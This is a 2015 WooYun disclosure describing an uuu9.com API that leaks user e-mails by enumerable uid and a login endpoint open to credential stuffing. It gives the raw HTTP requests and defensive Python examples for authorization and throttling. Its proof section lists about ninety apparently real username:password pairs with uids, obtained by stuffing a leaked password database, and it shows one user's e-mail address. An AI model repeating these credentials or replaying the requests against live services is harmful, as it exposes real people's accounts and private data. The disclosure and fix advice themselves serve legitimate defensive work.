
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0113584

Title: A poorly designed uuu9.com (游久网) API leaks partial user information (ten million users) and allows credential stuffing / brute force

Vendor: uuu9.com

Author: 小手冰凉

Submitted: 2015-05-12 10:11

Fixed: 2015-06-26 10:42

Published: 2015-06-26 10:42

Vulnerability type: unauthorized access / privilege bypass

Severity: high

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-12: Details sent to the vendor, awaiting vendor handling
2015-05-12: Vendor confirmed; details visible to the vendor only
2015-05-22: Details disclosed to core white hats and domain experts
2015-06-01: Details disclosed to regular white hats
2015-06-11: Details disclosed to intern white hats
2015-06-26: Details disclosed to the public

Brief description:

A poorly designed uuu9.com API leaks partial user information (ten million users) and allows credential stuffing / brute force.

Details:

I was watching a 小满 Dota video; at the end it recommended the 游久 app, so I tested it...
and found the following API call:

POST /Member/info.html HTTP/1.1
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Host: api.yoyo.uuu9.com
Connection: Keep-Alive
User-Agent: android-async-http/1.4.3 (http://loopj.com/android-async-http)
Accept-Encoding: gzip

uid=12423778&onlymark=d8cc53dc-598a-3ec8-8875-cadaf3b20e01skk


The response returns that user's personal data (username and e-mail address included):

{"state":1,"info":{"username":"lqh47258","email":"83640544@qq.com","bg_1_link":"http:\/\/api.yoyo.uuu9.com\/Public\/background\/default1.jpg?t=1431394782","bg_2_link":"http:\/\/api.yoyo.uuu9.com\/Public\/background\/default2.jpg?t=1431394782","background":1,"bg_link":"http:\/\/api.yoyo.uuu9.com\/Public\/background\/default1.jpg?t=1431394782?t=1431394782","headimg":"http:\/\/u.uuu9.com\/uct\/avatar.php?uid=12423778&size=small1431394782","gcount":null,"fcount":null,"ccount":"0"}}


Testing showed that the uid can be enumerated: the range is 1 to 12423778, over ten million ids! The first few are admin accounts, obvious from their usernames, and the upper end keeps growing as more users register. Are there really that many users? I randomly sampled ten thousand uids from this range and confirmed they were real user records. Nothing in the request ties the caller to the uid: onlymark is just a device identifier, not a credential, so any client can ask for any uid.
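The missing check, as an added example that is not code from uuu9.com or from this report: a Python model of /Member/info.html in which the vulnerable handler looks up whatever uid the request body names, while the hardened one takes the subject from the caller's server-side session and refuses a body uid that names anyone else. The user table, session store, uids and onlymark value are constructed for the example; the site's real framework and session handling are unknown.

```python
"""Object-level authorization for a user-profile endpoint.

Added example, not code from uuu9.com or the original report. It models the
/Member/info.html endpoint with a constructed in-memory user table and
session store; the site's real framework is unknown.
"""
import secrets
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Optional

# Constructed sample rows; uids sit inside the 1..12423778 range the report describes.
USERS = {
    1: {"username": "admin", "email": "admin@example.invalid"},
    2: {"username": "editor", "email": "editor@example.invalid"},
    3: {"username": "player3", "email": "player3@example.invalid"},
    12423778: {"username": "newest", "email": "newest@example.invalid"},
}

SESSIONS: Dict[str, int] = {}   # session token -> uid, populated only by login()


@dataclass
class Request:
    form: Dict[str, str]                  # parsed x-www-form-urlencoded body
    session_token: Optional[str] = None   # cookie or bearer token; None if unauthenticated


def login(uid: int) -> str:
    """Issue an unguessable session token bound to uid (stand-in for the real login)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = uid
    return token


def _parse_uid(value: Optional[str]) -> Optional[int]:
    try:
        return int(value) if value is not None else None
    except ValueError:
        return None


def info_vulnerable(req: Request) -> dict:
    """Reported behaviour: whatever uid the body names is looked up and returned.
    onlymark is only a device identifier, so nothing proves the caller owns that uid."""
    user = USERS.get(_parse_uid(req.form.get("uid")))
    if user is None:
        return {"state": 0}
    return {"state": 1, "info": dict(user)}


def info_fixed(req: Request) -> dict:
    """Hardened: the subject comes from the server-side session, never from the body.
    A body uid that names anyone else is refused; the response never includes their data."""
    caller = SESSIONS.get(req.session_token) if req.session_token else None
    if caller is None:
        return {"state": 0, "error": "login required"}   # would be HTTP 401
    requested = req.form.get("uid")
    if requested is not None and _parse_uid(requested) != caller:
        return {"state": 0, "error": "forbidden"}        # would be HTTP 403
    return {"state": 1, "info": dict(USERS[caller])}


def enumerate_emails(handler: Callable[[Request], dict], uids: Iterable[int],
                     session_token: Optional[str] = None) -> Dict[int, str]:
    """Replay of the report's uid sweep against a handler: one request per uid,
    collecting every e-mail address the handler hands back."""
    leaked: Dict[int, str] = {}
    for uid in uids:
        resp = handler(Request({"uid": str(uid), "onlymark": "device-id"}, session_token))
        if resp.get("state") == 1:
            leaked[uid] = resp["info"]["email"]
    return leaked


if __name__ == "__main__":
    probe = [1, 2, 3, 4, 12423778]
    print("vulnerable:", enumerate_emails(info_vulnerable, probe))
    token = login(3)
    print("fixed, logged in as uid 3:", enumerate_emails(info_fixed, probe, token))
    print("fixed, no session:", enumerate_emails(info_fixed, probe))
```

Against the vulnerable handler the sweep returns every existing uid's e-mail; against the fixed one it returns only the caller's own record, and nothing at all without a valid session. The same rule applies to any other endpoint that takes a uid, avatar, or "my" resource id from the client.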



In addition, I found a login check endpoint that allows credential stuffing and brute force:

POST /Member/logintest.html HTTP/1.1
Content-Length: 80
Content-Type: application/x-www-form-urlencoded
Host: api.yoyo.uuu9.com
Accept-Encoding: identity

username=<username>&password=<plaintext password>&onlymark=d8cc53dc-598a-3ec8-8875-cadaf3b20e01


There is no rate limit, captcha or lockout on this endpoint, so it supports not only credential stuffing but also brute force against single accounts. As before, I tested with the leaked CSDN database.
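One way to close the credential-stuffing and brute-force hole, as an added example that is not the site's code: a Python login guard that caps attempts per client (source IP, or the app's onlymark device id) in a sliding window and temporarily locks an account after repeated failures, both checked before any password is verified. The accounts, thresholds and scrypt parameters are assumptions; how the real /Member/logintest.html is implemented is unknown.

```python
"""Throttling a login endpoint against credential stuffing and brute force.

Added example, not code from uuu9.com or the original report. It models
/Member/logintest.html with a constructed in-memory user table and layers two
independent controls in front of password verification: a sliding-window cap
on attempts per client and a per-account failure counter with a temporary lockout.
"""
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque
from typing import Optional, Tuple

WINDOW_SECONDS = 60
MAX_ATTEMPTS_PER_CLIENT = 20   # all usernames combined: catches stuffing runs
MAX_FAILURES_PER_ACCOUNT = 5   # one username: catches brute force
LOCKOUT_SECONDS = 900          # assumed values; tune to real traffic


def _derive(password: str, salt: bytes) -> bytes:
    # Memory-hard KDF so an offline attack on a dumped table is expensive too.
    return hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    salt = salt or os.urandom(16)
    return salt, _derive(password, salt)


# Constructed sample accounts; nothing here comes from the site.
USERS = {name: hash_password(pw) for name, pw in [("alice", "correct horse"), ("bob", "hunter2")]}
_DUMMY_SALT = os.urandom(16)


class LoginGuard:
    def __init__(self, clock=time.time):
        self.clock = clock                       # injectable for testing
        self.client_hits = defaultdict(deque)    # client id -> timestamps of attempts
        self.failures = defaultdict(int)         # username -> consecutive failures
        self.locked_until = {}                   # username -> unlock time

    def _client_over_limit(self, client: str, now: float) -> bool:
        hits = self.client_hits[client]
        while hits and hits[0] <= now - WINDOW_SECONDS:
            hits.popleft()
        hits.append(now)
        return len(hits) > MAX_ATTEMPTS_PER_CLIENT

    def login(self, client: str, username: str, password: str) -> str:
        now = self.clock()
        if self._client_over_limit(client, now):
            return "rate_limited"   # HTTP 429; the password is never evaluated
        if self.locked_until.get(username, 0) > now:
            return "locked"         # same answer whether or not the password is right
        record = USERS.get(username)
        if record is None:
            _derive(password, _DUMMY_SALT)   # burn the same cost so timing doesn't reveal existence
            ok = False
        else:
            salt, expected = record
            ok = hmac.compare_digest(_derive(password, salt), expected)
        if ok:
            self.failures.pop(username, None)
            return "ok"
        self.failures[username] += 1
        if self.failures[username] >= MAX_FAILURES_PER_ACCOUNT:
            self.locked_until[username] = now + LOCKOUT_SECONDS
            self.failures[username] = 0
        return "invalid"            # one generic message for bad username and bad password


if __name__ == "__main__":
    guard = LoginGuard()
    # A stuffing run from one device: a different leaked pair per request.
    results = [guard.login("203.0.113.5", f"user{i}", "password") for i in range(25)]
    print(results.count("invalid"), "evaluated,", results.count("rate_limited"), "throttled")
```

Per-account lockout on its own lets an attacker lock victims out with a handful of bad guesses, so the per-client cap does the main work and lockouts are kept short. A stuffing run that rotates source IPs and device ids will still slip under both limits; that needs a global threshold on the failure rate or a captcha step, which this example does not include.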

Proof of vulnerability:

Partial credential-stuffing results (admin accounts redacted), as username:password and the uid the site returned:

mockmoon8336187:8336187asd uid:5007940
ziyem4:19821220 uid:1315505
oetzi365:19831201 uid:4299799
cjlcjling:2590530cjl uid:3718539
xj1988088:383854380 uid:3077302
hyf1129:19891129 uid:7015413
kingdomtbk:19851031 uid:463588
jenny8288:56133719 uid:549655
zengchihai:z61454654 uid:3109949
zenghaibo1989:zhb7221162 uid:9515443
crazy_demon:angelyys16 uid:2460079
heng19861229:heng1025 uid:4901596
wjwshmily:wangjiawei uid:1265276
c_jianwu:103104103 uid:4479645
lzzeddy:liuzaizhe uid:3060429
idiotddk:11111111 uid:3574892
free514689263:fnhmqj890912 uid:4010947
lx262853530:lx19891029 uid:3295305
q916613618:513148977 uid:6746443
himalayashf:hf19890408 uid:2772770
zuyfg520:19891106 uid:5079172
wenchongqi:19821020 uid:2060863
szyqita:zhiyong1986 uid:3758154
yanpingwan:sentimental uid:5553554
snow9155:yanhan9155 uid:4152779
juy23174:juy1392010 uid:1245955
xixbnb:56770165 uid:3389146
wbc1988:1988414a uid:10023488
tianrun2:55028006 uid:994897
fanss123:12354321 uid:630019
yechaoys:2576267YeChao uid:4158613
jy3204183:hjwisatc uid:551692
zh6486007:13802709418 uid:2421168
lubony:82250755 uid:8264909
iawpa:779042174 uid:3461872
htq19870607:53286566 uid:1411383
fairyilove:liuxianwan uid:3086253
lengwing1:wingshadow uid:2457728
maple0620:88499926 uid:4411327
hubeixuxi:hubei1988914 uid:3497491
tank39573:86868025 uid:267117
yxl1118:250103271 uid:5147687
yonghaoyip:199462112 uid:2346989
h357515283:19870824 uid:3742181
iceify:iceify_99 uid:3831679
ljg2353:23531420 uid:3908969
liuziyi708:850318108 uid:4565277
ad51241131:ad51241133 uid:1178910
hcc1989:arsenal0577 uid:1714212
gaiahc:22303712* uid:4637621
chx19357:chenhx19357 uid:3639413
w174184047:68086390 uid:4546860
tony871018:tony5212129 uid:1785540
jy02192915:ly86710467 uid:3951091
txh100:steers19841122 uid:4847243
qiandai1988:huijiejie1988 uid:1709544
dawang117:qq123456 uid:598327
simoncxl:5845211314 uid:4223670
lgl198842:qweasd1214 uid:3291243
rk136283613:woshishe uid:2724497
zhumashutou:258468895 uid:1919266
zxc129102:19941002 uid:2285649
wuyonglin1993:32201937 uid:1060252
luck5566:changeme uid:888217
zl315524506:ymx5897665 uid:4328202
jianxing2001:gashnr54r uid:5132457
jk2661809:1598753624 uid:1956888
fzg1994:526201344 uid:1814302
ll2921892:LWZL139791 uid:2889071
sunoosmile:zlxlyr988225 uid:5025925
newtangkai:tangkai3 uid:6623387
davewang1218:5242879qs uid:4177601
hrq4399:qq000000 uid:3417280
z241116778:6354968200 uid:3378486
wannianzhilang:pipiaidag uid:5746376
borty:19801210 uid:706344
zj1990222:hx1988919 uid:2171430
leek1987:lik1987229 uid:1449751
zhongyi_555:13868687332 uid:3389151
areyouaboy:youareaboy uid:3408614
virgoviolet:19880427 uid:5230352
jk0411:68514355 uid:3449360
new11:12345678 uid:2016084
zhuasenven:senvenzhua uid:4230563
gqllove:820834502 uid:3583813
swdefrgt:fbta11sj uid:3502244
ilovesilc:50694208 uid:2197073
weee430:asd5526157 uid:4610581
qq864394800:866226770 uid:4574883
seven19871016:z1650232 uid:3435368
loverockxqb:19850821 uid:4602251
huxin987:84853668 uid:4412797

Fix recommendations:

Add an authorization check to /Member/info.html so it only returns the record of the authenticated caller (from the server-side session), never an arbitrary uid from the request body, and stop returning e-mail addresses to other users.
Add usage limits to /Member/logintest.html (per client and per account, with captcha or temporary lockout) to prevent credential stuffing and brute force.

Copyright notice: please credit 小手冰凉@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 15

Confirmed: 2015-05-12 10:41

Vendor reply:

Thanks for the heads-up; developers have been assigned to handle it.

Latest status:

None yet


Vulnerability assessment:

Comments

  1. 2015-05-12 10:15 | 小手冰凉 (regular white hat | Rank:174 vulns:18 | 幸福你我他)

    no no no no no no Another small vendor? @疯狗 and no redaction again?